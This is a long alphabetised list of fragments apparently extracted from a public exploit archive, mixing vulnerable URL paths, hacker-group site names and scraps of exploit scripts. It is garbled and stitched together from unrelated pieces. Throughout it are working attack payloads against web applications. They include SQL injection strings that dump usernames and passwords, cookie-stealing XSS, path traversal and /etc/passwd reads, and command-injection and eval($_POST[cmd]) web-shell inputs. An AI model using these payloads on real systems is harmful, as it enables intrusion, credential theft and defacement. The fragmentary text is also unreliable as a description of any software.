index.php?site=guestbook&id=
index.php?site=guestbook&id=9999999999+union
index.php?sitemap=..
index.php?site=movies&action=show&id=1+and+1=1--+
index.php?site=movies&action=show&id=1+and+1=2--+ 
index.php?site=movies&action=show&id=[vul]
index.php?site=search&keyword=1)'
index.php?site=signup
index.php?site=[site_name]&cat=-1
index.php?site=[SQL Injection]
index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user
index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+
index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
index.php?site=videos&action=detail&id=2&portal=[vul]
index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1
index.php" size="30" 
index.php" size = "50"> <br 
index.php?skin=
index.php?skin=..
index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%
index.php?skin=[LFI]
index.php?skin=[Local File]%00
index.php?sl=..
index.php?sl=[file]%00
index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1
index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6
index.php?sortdir=ASC&level=album&id=[SQL]
index.php?sort_mode=!@#$%
index.php?sort_mode=suntzuuuuuuuuuuuuu
index.php?sort="><script>alert(document.cookie)<
index.php?sort='[SQL INJECTION] 
index.php?sql_debug=1
index.php?SqlQuery=test
index.php?src=[lfi]   
index.php?src=[remote shell]
index.php?ss_action=..
index.php?s=search&term=123%27
index.php?ss_module=..
index.php?stage=..
index.php?start="><script>alert()<
index.php?start=[SQL]
index.php?start=[SQL Injection]
index.php?static_page_id=1+union+select+1,user(),3,4,5,6
index.php?step=2&language=..
index.php?step=3
index.php?StoryID=[SQL] 
index.php?story=[SQL CODE]                     #
index.php?string=[sql injection code]
index.php?str_replace=[shell script]
index.php" style="text-decoration: none; font-weight: 700">
index.php?subaction=showcomments&id=[number]&archive=&start_from=&ucat=&">[code]
index.php?subaction=showfull&id=1115310052&archive=&start_from=&ucat=6&
index.php?subaction=userinfo&user=' . $argv[2];
index.php?subj=-3+union+select+1,concat_ws(0x3a,username,hashed_password),3,4,5+from+users--
index.php?subj=4
index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password
index.php?subj=6--
index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full
index.php?subj=6" --findcol
index.php?subj=[INDONESIANCODER]
index.php?subj=[SQL]
index.php?submit" method="POST"
index.php?subpage=[SQL]
index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C
index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)<
index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin
index.php?sub=users&action=details&user_id=[SQLI]
index.php?sub=users&action=store&type=add" 
index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
index.php?systemId=5'+union+select+1,2,concat_ws(0x3a3a,adminId,name,password,email,groupId),4,5+from+gamecms_admin
index.php?system=Modules&page=admin&active=Menu&req=
index.php?system=SEO&page=edit" method="post" name="main">
index.php?system=Users&page=edit&active=USERNAME" method="post" name="main">
index.php?t=..
index.php?ta=..
index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
index.php?-table=%27
index.php?-table=books&-action=browse_by_cat&-cursor
index.php?table=Groups&add_new_item=x)
index.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC
index.php?table_name=vendor&function=search&where_clause=[SQL INJECTION]&page=0&order=Address&order_type=ASC
index.php?tab=[SQLi]
index.php?tampon=test
index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL] 
index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=&x=11&y=3&sort_by=[SQL]
index.php?taskID=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?task=login
index.php?task=results&campaign_id=1 and 1=1 <= TRUE
index.php?task=results&campaign_id=1 and 1=2 <= FALSE
index.php?task=results&campaign_id=[BLIND]
index.php?tasks=all%22%3E%3Cscript
index.php?task=search&q="><marquee>hey, thisworks!<
index.php?task=search&q="><script>alert(String.fromCharCode(88,83,83))<
index.php?t=detailticket&id=root%20me 
index.php?tema=2&
index.php?tema="><script>alert('y3nh4ck3r was here!')<
index.php?template=..
index.php?template=css&type=some_url%0d%0aSet-Cookie%3Aheader
index.php?template=[Evil Code]
index.php?template=[LFI]
index.php?template=[LFI]%00
index.php?template=<script>alert('Moroccan Security Team');<
index.php?template=system&option=com_jeeventcalendar&view=event&Itemid=155&event_id=-1%22+UNION+ALL+SELECT+1,@@version,database(),username,password,6,7,8+FROM+jos_users%23
index.php?template=system&option=com_jeeventcalendar&view=event&Itemid=155&event_id=[SQL]
index.php?term=achkl&in=album&action=search&start=0'
index.php?term="><script>alert(String.fromCharCode(Your
index.php?test=2
index.php?test_filter[wp_head][99][0]=pi&test_filter[wp_head][99][1]=cos&test_filter[wp_head][99][2]=phpinfo
index.php?text_name=[inj3ct0r sh3ll]
index.php?tg=addon
index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);<
index.php?tg=admoc&idx=addoc&item="><script>alert(9);<
index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2
index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users
index.php?tgs_language_id=[SQL Injection] 
index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP
index.php?tg=users&bupd="><script>alert(7);<
index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);<
index.php?tg=users&idx=List&pos=A"><script>alert(10);<
index.php?theme=
index.php?theme=..
index.php?theme=[EV!L]
index.php? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1
index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1
index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1
index.php?theme= [LFI]%00
index.php?themesdir=[[Sh3LLScript]]
index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro
index.php?tim=%22%3E%3Cscript%3Ealert(&#039;Ellipsis%20Security%20Test&#039;)%3C
index.php?tim=SQL
index.php?title[]=1
index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
index.php?title=Main_Page
index.php?title=Special:Captcha
index.php?t=kbase&act=kans&id=[sql]
index.php?t=[LFI]%00
index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
index.php?tm_userid=_&tm_orderid=&tm_transt
index.php&to=000
index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members
index.php?todo=orderlinks&action=displaycat&
index.php?ToDo=processLogin?username=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B<
index.php?ToDo=processLogin?username=test&password=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B<
index.php?todo=showsubsite&subsite=[file]%00
index.php?topic=..
index.php?topic=12345.0&alert('cookie:\n'+document.cookie)
index.php?topic=1788.0
index.php?topic=196380.0
index.php?topic=29.0                 #
index.php?topic=50103.0' ]
index.php?topic=[LocalFile]%00
index.php?topic=te'st
index.php?topic=".$topic;
index.php?topmenuitem=&#039;[SQL]
index.php?top_message=<h1>OWNED?%20*g*<
index.php?top_message=<script>alert(document.cookie)<
index.php to see execut injected code
index.php to see the content of "
index.php?t=ph&id=null'+union+select+
index.php?tpl_dir=[SQL Injection]
index.php?tri=2";
index.php", true);
index.php?t=tickettime&id=&lt;script&gt;alert(document.cookie)&lt;
index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
index.php?twg_album=&#039;><script>alert(document.cookie)<
index.php?type=-1
index.php?type=1&base=vjek&nom=Téléchargements
index.php?type=3&lien_2=..
index.php?type=3&lien_2=config
index.php?type=account 
index.php?typefilter=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
index.php?type=';INSERTCODE;
index.php?type=password&mod=resetok" method="post">
index.php?type=';system('whoami');
index.php?type=tpl&form=<h1> x1ng <h1
index.php?u=..
index.php&u=&copt=1&pathext=                                                #
index.php?uid=%22%3E%3Cscript%3Ealert%28
index.php?uid=2&cid=2&pid=1+and+1=0 --> FALSE
index.php?uid=2&cid=2&pid=1+and+1=1 --> TRUE
index.php?UID=' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
index.php?uid="><script>alert(0)<
index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null
index.php?ukey=news&blog_id=<script>alert(123)<
index.php?um_name=&um_surname=&um_aid=&um_s
index.php?uniqcode=KPI&menu_no_top=performance&uri=[local-file]
index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C
index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users
index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users
index.php?url=[RFI]&file=Search
index.php?user=1<br>
index.php?user=2%27+UNION+ALL+SELECT+1,version()
index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1
index.php?user=999%27%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%20--%201
index.php?user-agent=[SQL Injection]
index.php?user_langue=..
index.php?userman_form=..
index.php?userman_form='><h1>ByALBAYX<
index.php?userman_form="><script>alert(document.cookie)<
index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))<
index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy
index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
index.php?username=geeve&phid=[sqli]
index.php?username="><script>alert(document.cookie)<
index.php?Users
index.php?user_sess=1+MYFORUM 
index.php?user_sess=k
index.php?user_uid=..
index.php (Use Tamper Data)
index.php?valor=veure&idx=6+UNION%20SELECT%201,passwd,3,4,5+from+authuser
index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20 AND 1=0
index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%
index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20
index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20
index.php?v=   {EV!L EXPLO!T}  
index.php") via http POST method. 
index.php?view=..
index.php?view=ar_det&exhort=-36'
index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr
index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema
index.php?view=article&catid=14:recent&id= {EV!L EXPLO!T}
index.php?view=article&id=9312&task=edit&option=com_content&ret=aHR0cDovL2ItZWxla3Ryby5za2oubm8vaW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZ2aWV3PWNhdGVnb3J5JmxheW91dD1ibG9nJmlkPTExJkl0ZW1pZD0xOA==
index.php?view=CalendarView&rental_id=-45+union+select+1,2,3,concat(admin_name,0x3a,admin_password)20,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59+from+vr_admin--
index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--
index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3,4+from+rental_admin--
index.php?view=catalog&item_type=M&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
index.php?viewcat='SQL_INJECTION
index.php?view=cP
index.php?view=cwh'
index.php?view=DevelopmentItemResultsView&devWherePair
index.php?view=DevelopmentItemResultsView&where=project
index.php?view=DevelopmentItemResultsView&where=[SQL] 
index.php?view=docs&doc_id=XX
index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--
index.php?view=file&path=..
index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
index.php?view=help&faq=1&ref&cmd=[Command]
index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
index.php?view=help&faq=1&ref=[RCE
index.php?view=help&faq=1&ref=[Your ScripT]
index.php?view=noentryid&noentryid=20
index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user--
index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1--
index.php?view=options&optaction=updateall">
index.php?view=page&pagename=[Local_FIle]%00
index.php?view=page&pagename=tetete
index.php?view=photos&id=
index.php?view=photos&id=1
index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--
index.php?view=photos&id=-9999+
index.php?view=photos&id=[SQLi]
index.php?view=post&cityid=220&lang=en&catid=5&subcatid=18'
index.php?view=post&cityid=2&lang=en&catid=2&subcatid=[SQL]
index.php?view=read&id=
index.php?view=read&id=111111111+union+
index.php?view=redirect&url=javascript:alert(413528022209)
index.php?view=[SQL Injection]
index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube
index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9
index.php?v=list&i=0&p=..
index.php?v=list&i=0&p=<script>var%20variable=111111111111111111;alert(variable);<
index.php?&vmcchk=1&option=com_virtuemart&Itemid=45
index.php?von='SQL_HERE
index.php?vo="><script>alert(document.cookie);<
index.php		    [vulnerable : name]
index.php?weblog=name_of_weblog&keywords=<script code> 
index.php?webpages_form=..
index.php?webpages_form='><h1>ByALBAYX<
index.php?webpages_form="><script>alert(document.cookie)<
index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))<
index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
index.php?WE_LANGUAGE=..
index.php?words=&#039;[SQL]&where=1
index.php?words=%20&where=1&limit=40&last=SQL
index.php?words=%20&where=1&limit=SQL
index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate
index.php?x=0&caller=xlink&url=gallery.php&album=1[SQL]
index.php?x=0&itemgr=1[SQL]
index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t!
index.php?xajax=SelTheme&xajaxargs[]=..
index.php?x=browse&archivedate=')%20UNION%20SELECT%20'1','2',password,'4','5'%20FROM%20pixelpost_config
index.php?x=browse&category='UNION SELECT '1','2',admin,'4','5' FROM pixelpost_config WHERE id=1
index.php?x=browse&category='UNION SELECT '1','2',password,'4','5' FROM pixelpost_config WHERE id=1
index.php?x=f&id=-99'%20UNION%20SELECT%200,
index.php?xoopsOption=any_word
index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
index.php?xP=11&id=[num]
index.php?x=y Hai I am a spam message! Would you like 
index.php?y=1&i=%25-1%25' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23
index.php?y=2005&m=01
index.php?year=2005&month=12&day=[SQL] 
index.php?year=2009&object=1&lang=..
index.php?yearID=2010&monthID=2'[SQL_Injection]
index.php?yearID=2010'[SQL_Injection]&monthID=2
index.php (you can login from here)       ###
index.php?ypncat_id=[SQLi]
index.phtml?mode=view&album=`cat%20
index.phtml?mode=view&album=Sample+Album&pic=A-10.jpg&dispsize=`cat%20
index.phtml?mode=view&album=Sample+Album&pic=`cat%20
index.pl?node_id=0
index_priv.php
index_public.php HTTP
index_r2_c3.jpg\"><
index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC
index_short.php?table_name=vendor&function=search&where_clause=[SQL INJECTION]&page=0&order=Address&order_type=ASC
index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9
index.shtml?s=-1+union+select+1
index.shtml?th=-1+union+select+1
index_std.php?gfcommon=[Shell]
index?token=true&error=<
index?token=true&error=<script>alert("test")<
indexu
index.upload.php (index page)
indir
indir.asp?id=4048&sIslem=Indir
indir.asp?id=4899&sIslem=%DDndir
indir.php?id=-1
indir.php?id=595
indir.php?id=880
individual&include=
individual.php?pid="><iframe>
individu.class.php?path_om=[Shell]
indonesianblackhat.web.id
indonesian-cyber.org
indonesian-cyber.org (as Member)
indonesianhacker.org  (as Member)
indoushka
inertianews
inf
inferno.php?do=ScanMember&id=-1'
infernoshout.php?do=options&area=commands
infernotechnologies.net
infinix
info
info 
info.html.php?mosConfig_absolute_path=[shell] "
info\n\n"; 
info.php
info.php 
info.php      
info.php                                                      #
info.php%00
info.php.123png
info.php?asin=[shell]
info.php?catid=1&cat=
info.php?catid=1&cat=<font size=15 color=red>Hacked By CoBRa_21<
info.php?cookie=yes&user_com=biggest
info.php?cookie=yes&user_com=second
info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0
info.php?flight=[sql]
info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
info.php?id=230&clas=0   *
info.php?id=[sqli]
info.php?id=SQLI
info.php?section="><script>alert()<
info.php?variable=[code]
information_disclosure_in_bloofoxcms_1.html
information_disclosure_in_lightneasy.html
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES
informium
[Informium_path]
info.tiki.org
infusions
ingegneria
inhalt.php?dateien[news]=[SHELL]
inhalt.php?menuid=<script>alert(document.cookie);<
 in host\n";exit( 0 );}
inicial.php
inicial.php")
";ini_set("max_execution_time",0);echo "Hauru";passthru($_SERVER[HTTP_HAURU]);die;?>\r\n';
init
init_content.php?GLOBALS[g_campsiteDir]=[SHELL]
initdb.php" size="50" maxlength="150" 
init.gallery.php?include_class=[SHELL DIRECTORY]
initialize.php
initialize.php?hmail_config[includepath]=..
initialize.php?hmail_config[includepath]=c:\boot.ini%00
initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00
initiate.php?abs_path=[evil_scripts]
init.inc
init.inc.php%00
init.inc.php?user[language]=..
init.inc.php?user[template]=..
init.inc.php?wpabspath=RFI
init.inc.php?wpabspath=RFI OR 
init_pass2.php?c=123456&a=1&b=%
init_pass2.php?c=[newpass]&a=[user id]&b=%
init.php?anticode=phpinfo();
init.php?anticode=[YOUR PHP CODE]
init.php?apps_path[plug]=[Rfi]?
init.php?apps_path[themes]=[Rfi]?
init.php?CFG[CDIR]=[evilcode]
init.php?gateway_module=[Lfi]
init.php?HTTP_POST_VARS=xxx 
init.php?includepath=shell?
init.php?themes_module=[Lfi]
initsystem.php?loader_file=..
inj3ct0r
inj3ct0r.net
inj3ct0r.org
injader
[inject]?
">injected<
{Inject here}
injection
$injection");
injection.class.php?path_om=[Shell]
$injection HTTP
inject.js?><
injekan.lu?
inlinenews.php?rootdp=DSecRG&gsLanguage=..
inlinenews.php?rootdp=DSecRG&language_home=..
inlinenews.php?rootdp=DSecRG&nLink=..
in-link.html
inludes
inner.php?id=14&type=2
inner.php?id=14&type=2]
inner.php?id=14&type=2[SQLi]
#i; # no redirects
inout_adserver
inout_adserver_ultimate
inout_article_base_ultimate
inout_music_ultimate
in.php
in.php?
in.php?any_word
in.php?id=any_word
' . $input;
input_beer_xml.php
input_beer_xml_ugh.inc.php
><input id="changePW" type="hidden" name="changePW" value="0" 
><input type="hidden" name="uid" value="1" 
><input type="hidden" name="_wp_http_referer" value="
inputvalidation%3Cscript%3Ealert(window.location.hash)%3B%3C
inquiry
 (in Russian)
insanelysimple2
inscription.php
insecurity-ro.org
InselPhoto
insert_admin.php">
insert_image.php
insert_image.php\r\n";
insert_image.php?wysiwyg=
insert.inc.php?tpl_dir=[spread???]
insertion_fee_settings.php
insertmember.php HTTP
insertorder.cfm?CFID=123&CFTOKEN=1[sql query]
insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1
insert.php'>Milw0rm's MD5 Cracker<
insert_rating.php?img_id=[sql]
insertset.php 
insert_table.php?bgcolor=<
insert_user.php">
"; #Insert Victime Web Site
"; #Insert Victime Web Site Link
\"; #Insert Victime Web Site Link
insky
inso.host.sk
instalacion
instaladores
install
install-
install05.php?blog_language=..
install1.php" method="post"><table>
install3.php?database=none&cabsolute_path=[script]
installation
[INSTALLATION
[INSTALLATION PATH]
install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
install_complete.inc.php?install_root=[Shell]
installdir
[installdir]
[install_directory]
installer.php 
install_ispconfig
install_mod.php?act=go&load=1234.php..
<INSTALL PATH>
install.php
install.php                                  #
install.php")
install.php?ChatPath=..
install.php?cmd=ls%20-la&newlang=..
install.php?dbhost=DZ-ghost-Team&dbbase=Algeria-Hackerz&dbcreate=on&dbuser=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B<
install.php?dl=
install.php?dl=..
install.php?go=3 
install.php?L=..
install.php?L=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
install.php?language=
install.php?lng=
install.php" method="post">
install.php?_NE[AbsPath]=[shell]
install.php?newlang=..
install.php?page=etape3&v=no
install.php?skin=
install.php?step=3
install.php?step=4
install.php?url=..
Install_XiVO_With_CD
InstantSite
 in start of url address\n\n";
ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';--
' in sys.argv[1] :
int
Integrated
integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
_integrity_funcs.php?MOA_PATH=[AvriLhea]          
intelieditor
interact-2-4-1
interface
[INTERFACE]
interface_creator
interfaces.inc.php?install_root=[Shell]
intern0t-advisories
interna
internals
interna.php?txtCodiInfo='
interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10--
interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,@@version,5,6,7,8,9,10--
 - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 - international in scope and free for public use, CVE is a dictionary of publicly known information security vulnerabilities and exposures.
Internet-Browsers-C-C
internode.dl.sourceforge.net
interphoto
InterPhoto
interra
intertech.ps
intervention.class.php?path_om[Shell]
inthewild
intl
INTO
intranet
intrepidrealty.net
intro
introbuilder
Introduction?&CB=CB1&fileDN=mnF%3D2.
intro.php
intuit.php?approval=[lfi]
" inurl:
invaliduser@localhost:3336
inventory
Inventory.csv
inventory_downloadables
inventory.php?t=N&viewID=3665819[SQL]
Invision
invite.php?action=phpinfo
invite.php?roomid="><script>alert(document.cookie)<
invoice_search
invoices.php?i=[SQL] 
 in your links!\n";usage();exit();}
io
[ip]
<IP>
[IP]
IP]
 -ip 90.27.10.196
ip.a.dd.r
IP_ADDR
<ip_address>:80
i || $pass =~ m
IPB
ipb216
ipb.2.3.5
ipb330
ipban.php to see the result
ipb-invision-power-board-all-versions-1-x-2-x-3-x-admin-account-takeover-leading-to-code-execution-742
ip-board
ipbul.org
ipdetail.php?type=dst&FQDN=&ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&beginTime=0&endTime=1324665310
ipdetail.php?type=dst&FQDN=&ipAddress=773116111<SQLi Here>&beginTime=0&endTime=1324665310
ipguardian
iphone
iphotoalbum
ipigroup.org
ip-logger
IPManagerPage.class.php?base_path=[evil_scripts]
ipn_development_handler
ipnmonitor
ipod.accessories.me.uk
IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]
ip:port\"\n");}
ipreg
iproperty.thethinkery.net
ips2block
IP SRVER:8443
ipstextcheckemailaddress-does-not-match-new-2013-tlds-r41518*
iptbb
iptbb.org
[iptbb_path]
ip-telefooncentrale
iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
iranmc.org
irayoblog
IRCRASH.COM
IRCRASH.COM");
ircrash.MYD%00"
iris-citations-management-tool-post-auth-remote-command-execution
irokez
irokez.org
ironclad.net
irsr
irsr-0.2
irvian.cn								#
isadmin.inc.php?lang[access_forbiden]=<script>alert(123);<
isadmin.inc.php?lang[ident_title]=<script>alert(123);<
isadmin.inc.php?user[language]=..
) is a dynamic CMS system like mambo or limbo, allowing users
) is a feature packed and 
) is a PHP Image Gallery script.
) is a supporting API
 Is Back , Join Us !
isblog
isc2.sans.org
) is considered one of the 
iscripts
isc.sans.org
i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[SQL]
ishallnotcare.org
 - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
is", http_send($host, $packet), $m)) die("\n[-] Login failed!\n");
is-human
isiAJAX
isiajax.sourceforge.net
is incorrect
islamis4u.co.cc
islidex
Is mysql on the same machine as the httpd?
 is not 
 is not sufficiently 
isnull(1
ispconfig
isp-control.net
ispworker.de
issue 
issue%00
issue.php?id=[SQL]
issues
Istgah
iSupport
iSupport.php
iSupport.php => $
is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat (username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users
it
IT
it2.php.net
ITA
itablackhawk>
itablackhawk.altervista.org
itablackhawk.altervista.org>
itablackhawk.altervista.org>\r\n";
itarmory-component
itc_develop_category.php?itemid=10%27
itdiv.php
itechd.php?productid=604+AND+1=2--%20-[BLIND SQL-INJECTION VULNERABILITY]>
i || $tell !~ 
item
item4059
item4109
item4109' ]
item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--
/?item=download
ItemEditForm"
item_edit.inc.php?install_root=[Shell]
itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
ItemID
Itemid,0
Itemid,0 # Inject Here
/?ItemId=1%20and%20substring(@@version,1,1)=4  >>FALSE
